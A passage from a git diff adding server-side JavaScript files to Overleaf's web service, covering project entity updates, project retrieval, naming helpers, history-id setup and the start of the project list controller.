fileStoreUrl, + fileRef, + createdBlob, + } = await FileStoreHandler.promises.uploadFileFromDisk( + projectId, + { name: doc.name, rev: rev + 1 }, + fsPath + ) + try { + await fs.promises.unlink(fsPath) + } catch (err) { + logger.warn({ err, path: fsPath }, 'failed to clean up temporary file') + } + return { + projectId, + doc, + path: docPath, + fileRef, + fileStoreUrl, + userId, + source, + createdBlob, + } + }, + async withLock({ + projectId, + doc, + path, + fileRef, + fileStoreUrl, + userId, + source, + createdBlob, + }) { + const project = + await ProjectEntityMongoUpdateHandler.promises.replaceDocWithFile( + projectId, + doc._id, + fileRef, + userId + ) + const projectHistoryId = project.overleaf?.history?.id + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { + oldDocs: [{ doc, path }], + newFiles: [{ file: fileRef, path, url: fileStoreUrl, createdBlob }], + newProject: project, + }, + source + ) + const { folder } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: fileRef._id, + type: 'file', + }) + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + doc._id, + 'convertDocToFile' + ) + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewFile', + folder._id, + fileRef, + 'convertDocToFile', + null, + userId + ) + return fileRef + }, +}) + +async function setMainBibliographyDoc(projectId, newBibliographyDocId) { + logger.debug( + { projectId, mainBibliographyDocId: newBibliographyDocId }, + 'setting main bibliography doc' + ) + if (projectId == null || newBibliographyDocId == null) { + throw new Errors.InvalidError('missing arguments (project or doc)') + } + const docPath = + await ProjectEntityHandler.promises.getDocPathByProjectIdAndDocId( + projectId, + newBibliographyDocId + ) + if (ProjectEntityUpdateHandler.isPathValidForMainBibliographyDoc(docPath)) { + await Project.updateOne( + { _id: projectId }, + { mainBibliographyDoc_id: newBibliographyDocId } + ).exec() + } else { + throw new Errors.UnsupportedFileTypeError( + 'invalid file extension for main bibliography doc' + ) + } +} + +const ProjectEntityUpdateHandler = { + LOCK_NAMESPACE, + + addDoc: callbackifyMultiResult(addDoc, ['doc', 'folderId']), + + addDocWithRanges: callbackifyMultiResult(addDocWithRanges, [ + 'doc', + 'folderId', + ]), + + addFile: callbackifyMultiResult(addFile, [ + 'fileRef', + 'folderId', + 'createdBlob', + ]), + + addFolder: callbackifyMultiResult(addFolder, ['folder', 'parentFolderId']), + + convertDocToFile: callbackify(convertDocToFile), + + deleteEntity: callbackify(deleteEntity), + + deleteEntityWithPath: callbackify(deleteEntityWithPath), + + mkdirp: callbackifyMultiResult(mkdirp, [ + 'newFolders', + 'folder', + 'parentFolder', + ]), + + mkdirpWithExactCase: callbackifyMultiResult(mkdirpWithExactCase, [ + 'newFolders', + 'folder', + 'parentFolder', + ]), + + moveEntity: callbackify(moveEntity), + + renameEntity: callbackify(renameEntity), + + resyncProjectHistory: callbackify(resyncProjectHistory), + + setRootDoc: callbackify(setRootDoc), + + unsetRootDoc: callbackify(unsetRootDoc), + + setMainBibliographyDoc: callbackify(setMainBibliographyDoc), + + updateDocLines: callbackify(updateDocLines), + + upsertDoc: callbackifyMultiResult(upsertDoc, ['doc', 'isNew']), + + appendToDoc: callbackify(appendToDoc), + + upsertDocWithPath: callbackifyMultiResult(upsertDocWithPath, [ + 'doc', + 'isNew', + 'newFolders', + 'folder', + ]), + + upsertFile: callbackifyMultiResult(upsertFile, [ + 
'fileRef', + 'isNew', + 'oldFileRef', + ]), + + upsertFileWithPath: callbackifyMultiResult(upsertFileWithPath, [ + 'fileRef', + 'isNew', + 'oldFileRef', + 'newFolders', + 'folder', + ]), + + promises: { + addDoc, + addDocWithRanges, + addFile, + addFolder, + convertDocToFile, + deleteEntity, + deleteEntityWithPath, + mkdirp, + mkdirpWithExactCase, + moveEntity, + renameEntity, + resyncProjectHistory, + setRootDoc, + unsetRootDoc, + updateDocLines, + upsertDoc, + upsertDocWithPath, + upsertFile, + upsertFileWithPath, + appendToDocWithPath: appendToDoc, + }, + + async _addDocAndSendToTpds(projectId, folderId, doc, userId) { + let result, project + try { + ;({ result, project } = + await ProjectEntityMongoUpdateHandler.promises.addDoc( + projectId, + folderId, + doc, + userId + )) + } catch (err) { + throw OError.tag(err, 'error adding file with project', { + projectId, + folderId, + doc_name: doc != null ? doc.name : undefined, + doc_id: doc != null ? doc._id : undefined, + }) + } + + await TpdsUpdateSender.promises.addDoc({ + projectId, + docId: doc != null ? doc._id : undefined, + path: result?.path?.fileSystem, + projectName: project.name, + rev: 0, + folderId, + }) + return { result, project } + }, + + async _uploadFile(projectId, folderId, fileName, fsPath, linkedFileData) { + if (!SafePath.isCleanFilename(fileName)) { + throw new Errors.InvalidNameError('invalid element name') + } + const fileArgs = { + name: fileName, + linkedFileData, + } + try { + return await FileStoreHandler.promises.uploadFileFromDisk( + projectId, + fileArgs, + fsPath + ) + } catch (err) { + throw OError.tag(err, 'error uploading image to s3', { + projectId, + folderId, + file_name: fileName, + }) + } + }, + + async _addFileAndSendToTpds(projectId, folderId, fileRef, userId) { + let result, project + try { + ;({ result, project } = + await ProjectEntityMongoUpdateHandler.promises.addFile( + projectId, + folderId, + fileRef, + userId + )) + } catch (err) { + throw OError.tag(err, 'error adding file with project', { + projectId, + folderId, + file_name: fileRef.name, + fileRef, + }) + } + + const historyId = project?.overleaf?.history?.id + if (!historyId) { + throw new OError('project does not have a history id', { projectId }) + } + await TpdsUpdateSender.promises.addFile({ + projectId, + historyId, + fileId: fileRef._id, + hash: fileRef.hash, + path: result?.path?.fileSystem, + projectName: project.name, + rev: fileRef.rev, + folderId, + }) + return { result, project } + }, + + async _replaceFile( + projectId, + fileId, + userId, + newFileRef, + fileStoreUrl, + folderId, + source, + createdBlob + ) { + const { + oldFileRef, + project, + path, + newProject, + newFileRef: updatedFileRef, + } = await ProjectEntityMongoUpdateHandler.promises.replaceFileWithNew( + projectId, + fileId, + newFileRef, + userId + ) + + const oldFiles = [ + { + file: oldFileRef, + path: path.fileSystem, + }, + ] + const newFiles = [ + { + file: updatedFileRef, + createdBlob, + path: path.fileSystem, + url: fileStoreUrl, + }, + ] + const projectHistoryId = project.overleaf?.history?.id + await TpdsUpdateSender.promises.addFile({ + projectId: project._id, + historyId: projectHistoryId, + fileId: updatedFileRef._id, + hash: updatedFileRef.hash, + path: path.fileSystem, + rev: updatedFileRef.rev, + projectName: project.name, + folderId, + }) + + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { oldFiles, newFiles, newProject }, + source + ) + + return updatedFileRef + }, + + async 
_checkFiletree(projectId, projectHistoryId, entities) { + const adjustPathsAfterFolderRename = (oldPath, newPath) => { + oldPath = oldPath + '/' + newPath = newPath + '/' + for (const entity of entities) { + if (entity.path.startsWith(oldPath)) { + entity.path = newPath + entity.path.slice(oldPath.length) + } + } + } + + // Data structures for recording pending renames + const renames = [] + const paths = new Set() + for (const entity of entities) { + const originalName = entity.folder + ? entity.folder.name + : entity.doc + ? entity.doc.name + : entity.file.name + + let newPath = entity.path + let newName = originalName + + // Clean the filename if necessary + if (newName === '') { + newName = 'untitled' + } else { + newName = SafePath.clean(newName) + } + if (newName !== originalName) { + newPath = Path.join( + newPath.slice(0, newPath.length - originalName.length), + newName + ) + } + + // Check if we've seen that path already + if (paths.has(newPath)) { + newPath = ProjectEntityUpdateHandler.findNextAvailablePath( + paths, + newPath + ) + newName = newPath.split('/').pop() + } + + // If we've changed the filename, schedule a rename + if (newName !== originalName) { + renames.push({ entity, newName, newPath }) + if (entity.folder) { + // Here, we rely on entities being processed in the right order. + // Parent folders need to be processed before their children. This is + // the case only because getAllEntitiesFromProject() returns folders + // in that order and resyncProjectHistory() calls us with the folders + // first. + + adjustPathsAfterFolderRename(entity.path, newPath) + } + } + + // Remember that we've seen this path + paths.add(newPath) + } + + if (renames.length === 0) { + return + } + logger.warn( + { + projectId, + renames: renames.map(rename => ({ + oldPath: rename.entity.path, + newPath: rename.newPath, + })), + }, + 'found conflicts or bad filenames in filetree' + ) + + // Avoid conflicts by processing renames in the reverse order. If we have + // the following starting situation: + // + // somefile.tex + // somefile.tex + // somefile.tex (1) + // + // somefile.tex would be processed first, and then somefile.tex (1), + // yielding the following renames: + // + // somefile.tex -> somefile.tex (1) + // somefile.tex (1) -> somefile.tex (2) + // + // When the first rename was decided, we didn't know that somefile.tex (1) + // existed, so that created a conflict. By processing renames in the + // reverse order, we start with the files that had the most extensive + // information about existing files. + renames.reverse() + + for (const rename of renames) { + // rename the duplicate files + const entity = rename.entity + const entityId = entity.folder + ? entity.folder._id + : entity.doc + ? entity.doc._id + : entity.file._id + const entityType = entity.folder ? 'folder' : entity.doc ? 
'doc' : 'file' + const { changes } = + await ProjectEntityMongoUpdateHandler.promises.renameEntity( + projectId, + entityId, + entityType, + rename.newName, + null // unset lastUpdatedBy + ) + + // update the renamed entity for the resync + entity.path = rename.newPath + if (entityType === 'folder') { + entity.folder.name = rename.newName + } else if (entityType === 'doc') { + entity.doc.name = rename.newName + } else { + entity.file.name = rename.newName + } + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + null, + changes, + 'automatic-fix' + ) + } + }, + + findNextAvailablePath(allPaths, candidatePath) { + const incrementReplacer = (match, p1) => { + return ' (' + (parseInt(p1, 10) + 1) + ')' + } + // if the filename was invalid we should normalise it here too. Currently + // this only handles renames in the same folder, so we will be out of luck + // if it is the folder name which in invalid. We could handle folder + // renames by returning the folders list from getAllEntitiesFromProject + do { + // does the filename look like "foo (1)" if so, increment the number in parentheses + if (/ \(\d+\)$/.test(candidatePath)) { + candidatePath = candidatePath.replace(/ \((\d+)\)$/, incrementReplacer) + } else { + // otherwise, add a ' (1)' suffix to the name + candidatePath = candidatePath + ' (1)' + } + } while (allPaths.has(candidatePath)) // keep going until the name is unique + // add the new name to the set + allPaths.add(candidatePath) + return candidatePath + }, + + isPathValidForRootDoc(docPath) { + const docExtension = Path.extname(docPath) + return VALID_ROOT_DOC_REGEXP.test(docExtension) + }, + + isPathValidForMainBibliographyDoc(docPath) { + const docExtension = Path.extname(docPath).toLowerCase() + return docExtension === '.bib' + }, + + async _cleanUpEntity( + project, + newProject, + entity, + entityType, + path, + userId, + source + ) { + const subtreeListing = _listSubtree(entity, entityType, path) + await ProjectEntityUpdateHandler._updateProjectStructureWithDeletedEntity( + project, + newProject, + subtreeListing, + userId, + source + ) + + for (const entry of subtreeListing) { + if (entry.type === 'doc') { + await ProjectEntityUpdateHandler._cleanUpDoc( + project, + entry.entity, + entry.path, + userId + ) + } else if (entry.type === 'file') { + await ProjectEntityUpdateHandler._cleanUpFile(project, entry.entity) + } + } + return subtreeListing + }, + + async _updateProjectStructureWithDeletedEntity( + project, + newProject, + subtreeListing, + userId, + source + ) { + const changes = { oldDocs: [], oldFiles: [] } + for (const entry of subtreeListing) { + if (entry.type === 'doc') { + changes.oldDocs.push({ doc: entry.entity, path: entry.path }) + } else if (entry.type === 'file') { + changes.oldFiles.push({ file: entry.entity, path: entry.path }) + } + } + + // now send the project structure changes to the docupdater + changes.newProject = newProject + const projectId = project._id.toString() + const projectHistoryId = + project.overleaf && + project.overleaf.history && + project.overleaf.history.id + return await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + changes, + source + ) + }, + + async _cleanUpDoc(project, doc) { + const projectId = project._id.toString() + const docId = doc._id.toString() + if (project.rootDoc_id != null && project.rootDoc_id.toString() === docId) { + await ProjectEntityUpdateHandler.promises.unsetRootDoc(projectId) + } + + const { name } = doc 
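+    // Soft delete, not a hard drop: docstore keeps the doc under its name
+    // together with a deletedAt timestamp (presumably so it can still be
+    // inspected or restored later), and the doc is then removed from the
+    // document updater.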
+ const deletedAt = new Date() + await DocstoreManager.promises.deleteDoc(projectId, docId, name, deletedAt) + + return await DocumentUpdaterHandler.promises.deleteDoc(projectId, docId) + }, + + async _cleanUpFile(project, file) { + return await ProjectEntityMongoUpdateHandler.promises._insertDeletedFileReference( + project._id, + file + ) + }, +} + +/** + * List all descendants of an entity along with their type and path. Include + * the top-level entity as well. + */ +function _listSubtree(entity, entityType, entityPath) { + if (entityType.indexOf('file') !== -1) { + return [{ type: 'file', entity, path: entityPath }] + } else if (entityType.indexOf('doc') !== -1) { + return [{ type: 'doc', entity, path: entityPath }] + } else if (entityType.indexOf('folder') !== -1) { + const listing = [] + const _recurseFolder = (folder, folderPath) => { + listing.push({ type: 'folder', entity: folder, path: folderPath }) + for (const doc of iterablePaths(folder, 'docs')) { + listing.push({ + type: 'doc', + entity: doc, + path: Path.join(folderPath, doc.name), + }) + } + for (const file of iterablePaths(folder, 'fileRefs')) { + listing.push({ + type: 'file', + entity: file, + path: Path.join(folderPath, file.name), + }) + } + for (const childFolder of iterablePaths(folder, 'folders')) { + _recurseFolder(childFolder, Path.join(folderPath, childFolder.name)) + } + } + _recurseFolder(entity, entityPath) + return listing + } else { + // This shouldn't happen, but if it does, fail silently. + return [] + } +} + +module.exports = ProjectEntityUpdateHandler diff --git a/services/web/app/src/Features/Project/ProjectGetter.js b/services/web/app/src/Features/Project/ProjectGetter.js new file mode 100644 index 0000000..7edf08d --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectGetter.js @@ -0,0 +1,160 @@ +const { db } = require('../../infrastructure/mongodb') +const { normalizeQuery } = require('../Helpers/Mongo') +const OError = require('@overleaf/o-error') +const { Project } = require('../../models/Project') +const LockManager = require('../../infrastructure/LockManager') +const { DeletedProject } = require('../../models/DeletedProject') +const { callbackifyAll } = require('@overleaf/promise-utils') + +const ProjectGetter = { + EXCLUDE_DEPTH: 8, + + async getProjectWithoutDocLines(projectId) { + const excludes = {} + for (let i = 1; i <= ProjectGetter.EXCLUDE_DEPTH; i++) { + excludes[`rootFolder${Array(i).join('.folders')}.docs.lines`] = 0 + } + return await ProjectGetter.getProject(projectId, excludes) + }, + + async getProjectWithOnlyFolders(projectId) { + const excludes = {} + for (let i = 1; i <= ProjectGetter.EXCLUDE_DEPTH; i++) { + excludes[`rootFolder${Array(i).join('.folders')}.docs`] = 0 + excludes[`rootFolder${Array(i).join('.folders')}.fileRefs`] = 0 + } + return await ProjectGetter.getProject(projectId, excludes) + }, + + async getProject(projectId, projection = {}) { + if (projectId == null) { + throw new Error('no project id provided') + } + if (typeof projection !== 'object') { + throw new Error('projection is not an object') + } + + if (projection.rootFolder || Object.keys(projection).length === 0) { + const ProjectEntityMongoUpdateHandler = require('./ProjectEntityMongoUpdateHandler') + return await LockManager.promises.runWithLock( + ProjectEntityMongoUpdateHandler.LOCK_NAMESPACE, + projectId, + () => ProjectGetter.getProjectWithoutLock(projectId, projection) + ) + } else { + return await ProjectGetter.getProjectWithoutLock(projectId, projection) + } + }, + + async 
getProjectWithoutLock(projectId, projection = {}) { + if (projectId == null) { + throw new Error('no project id provided') + } + if (typeof projection !== 'object') { + throw new Error('projection is not an object') + } + + const query = normalizeQuery(projectId) + + let project + try { + project = await db.projects.findOne(query, { projection }) + } catch (error) { + OError.tag(error, 'error getting project', { + query, + projection, + }) + throw error + } + + return project + }, + + async getProjectIdByReadAndWriteToken(token) { + const project = await Project.findOne( + { 'tokens.readAndWrite': token }, + { _id: 1 } + ).exec() + + if (project == null) { + return + } + + return project._id + }, + + async findAllUsersProjects(userId, fields) { + const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') + const ownedProjects = await Project.find( + { owner_ref: userId }, + fields + ).exec() + + const projects = + await CollaboratorsGetter.promises.getProjectsUserIsMemberOf( + userId, + fields + ) + + const result = { + owned: ownedProjects || [], + readAndWrite: projects.readAndWrite || [], + readOnly: projects.readOnly || [], + tokenReadAndWrite: projects.tokenReadAndWrite || [], + tokenReadOnly: projects.tokenReadOnly || [], + review: projects.review || [], + } + + // Remove duplicate projects. The order of result values is determined by the order they occur. + const tempAddedProjectsIds = new Set() + const filteredProjects = Object.entries(result).reduce((prev, current) => { + const [key, projects] = current + + prev[key] = [] + + projects.forEach(project => { + const projectId = project._id.toString() + + if (!tempAddedProjectsIds.has(projectId)) { + prev[key].push(project) + tempAddedProjectsIds.add(projectId) + } + }) + + return prev + }, {}) + + return filteredProjects + }, + + /** + * Return all projects with the given name that belong to the given user. + * + * Projects include the user's own projects as well as collaborations with + * read/write access. 
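+   *
+   * Name matching is case-insensitive.
+   *
+   * @example
+   * // illustrative only: returns owned or read/write projects whose name
+   * // equals 'thesis' in any casing
+   * const matches = await ProjectGetter.promises.findUsersProjectsByName(
+   *   userId,
+   *   'Thesis'
+   * )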
+ */ + async findUsersProjectsByName(userId, projectName) { + const allProjects = await ProjectGetter.findAllUsersProjects( + userId, + 'name archived trashed' + ) + + const { owned, readAndWrite } = allProjects + const projects = owned.concat(readAndWrite) + const lowerCasedProjectName = projectName.toLowerCase() + return projects.filter( + project => project.name.toLowerCase() === lowerCasedProjectName + ) + }, + + async getUsersDeletedProjects(userId) { + return await DeletedProject.find({ + 'deleterData.deletedProjectOwnerId': userId, + }).exec() + }, +} + +module.exports = { + ...callbackifyAll(ProjectGetter), + promises: ProjectGetter, +} diff --git a/services/web/app/src/Features/Project/ProjectHelper.js b/services/web/app/src/Features/Project/ProjectHelper.js new file mode 100644 index 0000000..dc64fbf --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectHelper.js @@ -0,0 +1,185 @@ +// ts-check +const { ObjectId } = require('mongodb-legacy') +const _ = require('lodash') +const { promisify } = require('util') +const Settings = require('@overleaf/settings') + +/** + * @import { MongoProject } from "./types" + */ + +const ENGINE_TO_COMPILER_MAP = { + latex_dvipdf: 'latex', + pdflatex: 'pdflatex', + xelatex: 'xelatex', + lualatex: 'lualatex', +} + +module.exports = { + compilerFromV1Engine, + isArchived, + isTrashed, + isArchivedOrTrashed, + calculateArchivedArray, + ensureNameIsUnique, + getAllowedImagesForUser, + promises: { + ensureNameIsUnique: promisify(ensureNameIsUnique), + }, +} + +function compilerFromV1Engine(engine) { + return ENGINE_TO_COMPILER_MAP[engine] +} + +/** + @param {MongoProject} project + @param {string} userId + * @returns {boolean} + */ +function isArchived(project, userId) { + userId = new ObjectId(userId) + + return (project.archived || []).some(id => id.equals(userId)) +} + +/** + * @param {MongoProject} project + * @param {string} userId + * @returns {boolean} + */ +function isTrashed(project, userId) { + userId = new ObjectId(userId) + + return (project.trashed || []).some(id => id.equals(userId)) +} + +/** + * @param {MongoProject} project + * @param {string} userId + * @returns {boolean} + */ +function isArchivedOrTrashed(project, userId) { + return isArchived(project, userId) || isTrashed(project, userId) +} + +function _allCollaborators(project) { + return _.unionWith( + [project.owner_ref], + project.collaberator_refs, + project.readOnly_refs, + project.tokenAccessReadAndWrite_refs, + project.tokenAccessReadOnly_refs, + _objectIdEquals + ) +} + +function calculateArchivedArray(project, userId, action) { + let archived = project.archived + userId = new ObjectId(userId) + + if (archived === true) { + archived = _allCollaborators(project) + } else if (!archived) { + archived = [] + } + + if (action === 'ARCHIVE') { + archived = _.unionWith(archived, [userId], _objectIdEquals) + } else if (action === 'UNARCHIVE') { + archived = archived.filter(id => !_objectIdEquals(id, userId)) + } else { + throw new Error('Unrecognised action') + } + + return archived +} + +function ensureNameIsUnique(nameList, name, suffixes, maxLength, callback) { + // create a set of all project names + if (suffixes == null) { + suffixes = [] + } + const allNames = new Set(nameList) + const isUnique = x => !allNames.has(x) + // check if the supplied name is already unique + if (isUnique(name)) { + return callback(null, name) + } + // the name already exists, try adding the user-supplied suffixes to generate a unique name + for (const suffix of suffixes) { + const 
candidateName = _addSuffixToProjectName(name, suffix, maxLength) + if (isUnique(candidateName)) { + return callback(null, candidateName) + } + } + // if there are no (more) suffixes, use a numeric one + const uniqueName = _addNumericSuffixToProjectName(name, allNames, maxLength) + if (uniqueName != null) { + callback(null, uniqueName) + } else { + callback(new Error(`Failed to generate a unique name for: ${name}`)) + } +} + +function _objectIdEquals(firstVal, secondVal) { + // For use as a comparator for unionWith + return firstVal.toString() === secondVal.toString() +} + +function _addSuffixToProjectName(name, suffix, maxLength) { + // append the suffix and truncate the project title if needed + if (suffix == null) { + suffix = '' + } + const truncatedLength = maxLength - suffix.length + return name.substr(0, truncatedLength) + suffix +} + +function _addNumericSuffixToProjectName(name, allProjectNames, maxLength) { + const NUMERIC_SUFFIX_MATCH = / \((\d+)\)$/ + const suffixedName = function (basename, number) { + const suffix = ` (${number})` + return basename.substr(0, maxLength - suffix.length) + suffix + } + + const match = name.match(NUMERIC_SUFFIX_MATCH) + let basename = name + let n = 1 + + if (match != null) { + basename = name.replace(NUMERIC_SUFFIX_MATCH, '') + n = parseInt(match[1]) + } + + const prefixMatcher = new RegExp(`^${_.escapeRegExp(basename)} \\(\\d+\\)$`) + + const projectNamesWithSamePrefix = Array.from(allProjectNames).filter(name => + prefixMatcher.test(name) + ) + const last = allProjectNames.size + n + const nIsLikelyAYear = n > 1000 && projectNamesWithSamePrefix.length < n / 2 + if (nIsLikelyAYear) { + basename = name + n = 1 + } + + while (n <= last) { + const candidate = suffixedName(basename, n) + if (!allProjectNames.has(candidate)) { + return candidate + } + n += 1 + } + + return null +} + +function getAllowedImagesForUser(user) { + const images = Settings.allowedImageNames || [] + if (user?.alphaProgram) { + return images + } else { + return images.filter(image => !image.alphaOnly) + } +} diff --git a/services/web/app/src/Features/Project/ProjectHistoryHandler.js b/services/web/app/src/Features/Project/ProjectHistoryHandler.js new file mode 100644 index 0000000..5ba3ee9 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectHistoryHandler.js @@ -0,0 +1,65 @@ +const { Project } = require('../../models/Project') +const ProjectDetailsHandler = require('./ProjectDetailsHandler') +const HistoryManager = require('../History/HistoryManager') +const ProjectEntityUpdateHandler = require('./ProjectEntityUpdateHandler') +const { callbackify } = require('util') + +const ProjectHistoryHandler = { + async setHistoryId(projectId, historyId) { + // reject invalid history ids + if (historyId == null) { + throw new Error('missing history id') + } + + // use $exists:false to prevent overwriting any existing history id, atomically + const result = await Project.updateOne( + { _id: projectId, 'overleaf.history.id': { $exists: false } }, + { 'overleaf.history.id': historyId } + ) + + if (result.matchedCount === 0) { + throw new Error('history exists') + } + }, + + async getHistoryId(projectId) { + const project = await ProjectDetailsHandler.promises.getDetails(projectId) + return project?.overleaf?.history?.id + }, + + async ensureHistoryExistsForProject(projectId) { + // We can only set a history id for a project that doesn't have one. 
The + // history id is cached in the project history service, and changing an + // existing value corrupts the history, leaving it in an irrecoverable + // state. Setting a history id when one wasn't present before is ok, + // because undefined history ids aren't cached. + let historyId = await ProjectHistoryHandler.getHistoryId(projectId) + + if (historyId != null) { + return + } + + historyId = await HistoryManager.promises.initializeProject(projectId) + if (historyId == null) { + throw new Error('failed to initialize history id') + } + + await ProjectHistoryHandler.setHistoryId(projectId, historyId) + + await ProjectEntityUpdateHandler.promises.resyncProjectHistory( + projectId, + {} + ) + + await HistoryManager.promises.flushProject(projectId) + }, +} + +module.exports = { + setHistoryId: callbackify(ProjectHistoryHandler.setHistoryId), + getHistoryId: callbackify(ProjectHistoryHandler.getHistoryId), + ensureHistoryExistsForProject: callbackify( + ProjectHistoryHandler.ensureHistoryExistsForProject + ), + promises: ProjectHistoryHandler, +} diff --git a/services/web/app/src/Features/Project/ProjectListController.mjs b/services/web/app/src/Features/Project/ProjectListController.mjs new file mode 100644 index 0000000..88541ee --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectListController.mjs @@ -0,0 +1,750 @@ +// ts-check +import _ from 'lodash' + +import Metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import ProjectHelper from './ProjectHelper.js' +import ProjectGetter from './ProjectGetter.js' +import PrivilegeLevels from '../Authorization/PrivilegeLevels.js' +import SessionManager from '../Authentication/SessionManager.js' +import Sources from '../Authorization/Sources.js' +import UserGetter from '../User/UserGetter.js' +import SurveyHandler from '../Survey/SurveyHandler.mjs' +import TagsHandler from '../Tags/TagsHandler.js' +import { expressify } from '@overleaf/promise-utils' +import logger from '@overleaf/logger' +import Features from '../../infrastructure/Features.js' +import SubscriptionViewModelBuilder from '../Subscription/SubscriptionViewModelBuilder.js' +import NotificationsHandler from '../Notifications/NotificationsHandler.js' +import Modules from '../../infrastructure/Modules.js' +import { OError, V1ConnectionError } from '../Errors/Errors.js' +import { User } from '../../models/User.js' +import UserPrimaryEmailCheckHandler from '../User/UserPrimaryEmailCheckHandler.js' +import UserController from '../User/UserController.js' +import LimitationsManager from '../Subscription/LimitationsManager.js' +import NotificationsBuilder from '../Notifications/NotificationsBuilder.js' +import GeoIpLookup from '../../infrastructure/GeoIpLookup.js' +import SplitTestHandler from '../SplitTests/SplitTestHandler.js' +import SplitTestSessionHandler from '../SplitTests/SplitTestSessionHandler.js' +import SubscriptionLocator from '../Subscription/SubscriptionLocator.js' +import TutorialHandler from '../Tutorial/TutorialHandler.js' + +/** + * @import { GetProjectsRequest, GetProjectsResponse, AllUsersProjects, MongoProject } from "./types" + * @import { ProjectApi, Filters, Page, Sort } from "../../../../types/project/dashboard/api" + * @import { Tag } from "../Tags/types" + */ + +const _ssoAvailable = (affiliation, session, linkedInstitutionIds) => { + if (!affiliation.institution) return false + + // institution.confirmed is for the domain being confirmed, not the email + // Do not show SSO UI for unconfirmed domains + if 
(!affiliation.institution.confirmed) return false + + // Could have multiple emails at the same institution, and if any are + // linked to the institution then do not show notification for others + if ( + linkedInstitutionIds.indexOf(affiliation.institution.id.toString()) === -1 + ) { + if (affiliation.institution.ssoEnabled) return true + if (affiliation.institution.ssoBeta && session.samlBeta) return true + return false + } + return false +} + +const _buildPortalTemplatesList = affiliations => { + if (affiliations == null) { + affiliations = [] + } + + const portalTemplates = [] + const uniqueAffiliations = _.uniqBy(affiliations, 'institution.id') + for (const aff of uniqueAffiliations) { + const hasSlug = aff.portal?.slug + const hasTemplates = aff.portal?.templates_count > 0 + + if (hasSlug && hasTemplates) { + const portalPath = aff.institution.isUniversity ? '/edu/' : '/org/' + const portalTemplateURL = Settings.siteUrl + portalPath + aff.portal?.slug + + portalTemplates.push({ + name: aff.institution.name, + url: portalTemplateURL, + }) + } + } + return portalTemplates +} + +function cleanupSession(req) { + // cleanup redirects at the end of the redirect chain + delete req.session.postCheckoutRedirect + delete req.session.postLoginRedirect + delete req.session.postOnboardingRedirect + + // cleanup details from register page + delete req.session.sharedProjectData + delete req.session.templateData +} + +/** + * @param {import("express").Request} req + * @param {import("express").Response} res + * @param {import("express").NextFunction} next + * @returns {Promise<void>} + */ +async function projectListPage(req, res, next) { + cleanupSession(req) + + // can have two values: + // - undefined - when there's no "saas" feature or couldn't get subscription data + // - object - the subscription data object + let usersBestSubscription + let survey + let userIsMemberOfGroupSubscription = false + let groupSubscriptionsPendingEnrollment = [] + + const isSaas = Features.hasFeature('saas') + + const userId = SessionManager.getLoggedInUserId(req.session) + const projectsBlobPending = _getProjects(userId).catch(err => { + logger.err({ err, userId }, 'projects listing in background failed') + return undefined + }) + const user = await User.findById( + userId, + `email emails features alphaProgram betaProgram lastPrimaryEmailCheck signUpDate refProviders${ + isSaas ? 
' enrollment writefull completedTutorials' : '' + }` + ) + + // Handle case of deleted user + if (user == null) { + UserController.logout(req, res, next) + return + } + + user.refProviders = _.mapValues(user.refProviders, Boolean) + + if (isSaas) { + await SplitTestSessionHandler.promises.sessionMaintenance(req, user) + + try { + usersBestSubscription = + await SubscriptionViewModelBuilder.promises.getBestSubscription({ + _id: userId, + }) + } catch (error) { + logger.err( + { err: error, userId }, + "Failed to get user's best subscription" + ) + } + try { + const { isMember, subscriptions } = + await LimitationsManager.promises.userIsMemberOfGroupSubscription(user) + + userIsMemberOfGroupSubscription = isMember + + // TODO use helper function + if (!user.enrollment?.managedBy) { + groupSubscriptionsPendingEnrollment = subscriptions.filter( + subscription => + subscription.groupPlan && subscription.managedUsersEnabled + ) + } + } catch (error) { + logger.error( + { err: error }, + 'Failed to check whether user is a member of group subscription' + ) + } + + try { + survey = await SurveyHandler.promises.getSurvey(userId) + } catch (error) { + logger.err({ err: error, userId }, 'Failed to load the active survey') + } + + if (user && UserPrimaryEmailCheckHandler.requiresPrimaryEmailCheck(user)) { + return res.redirect('/user/emails/primary-email-check') + } + } + + const tags = await TagsHandler.promises.getAllTags(userId) + + let userEmailsData = { list: [], allInReconfirmNotificationPeriods: [] } + + try { + const fullEmails = await UserGetter.promises.getUserFullEmails(userId) + + if (!Features.hasFeature('affiliations')) { + userEmailsData.list = fullEmails + } else { + try { + const results = await Modules.promises.hooks.fire( + 'allInReconfirmNotificationPeriodsForUser', + fullEmails + ) + + const allInReconfirmNotificationPeriods = (results && results[0]) || [] + + userEmailsData = { + list: fullEmails, + allInReconfirmNotificationPeriods, + } + } catch (error) { + userEmailsData = error + } + } + } catch (error) { + if (!(error instanceof V1ConnectionError)) { + logger.error({ err: error, userId }, 'Failed to get user full emails') + } + } + + const userEmails = userEmailsData.list || [] + + const userAffiliations = userEmails + .filter(emailData => !!emailData.affiliation) + .map(emailData => { + const result = emailData.affiliation + result.email = emailData.email + return result + }) + + const portalTemplates = _buildPortalTemplatesList(userAffiliations) + + const { allInReconfirmNotificationPeriods } = userEmailsData + + const notifications = + await NotificationsHandler.promises.getUserNotifications(userId) + + for (const notification of notifications) { + notification.html = req.i18n.translate( + notification.templateKey, + notification.messageOpts + ) + } + + const notificationsInstitution = [] + // Institution and group SSO Notifications + let groupSsoSetupSuccess + let reconfirmedViaSAML + if (Features.hasFeature('saml')) { + reconfirmedViaSAML = _.get(req.session, ['saml', 'reconfirmed']) + const samlSession = req.session.saml + // Notification: SSO Available + const linkedInstitutionIds = [] + userEmails.forEach(email => { + if (email.samlProviderId) { + linkedInstitutionIds.push(email.samlProviderId) + } + }) + if (Array.isArray(userAffiliations)) { + userAffiliations.forEach(affiliation => { + if (_ssoAvailable(affiliation, req.session, linkedInstitutionIds)) { + notificationsInstitution.push({ + email: 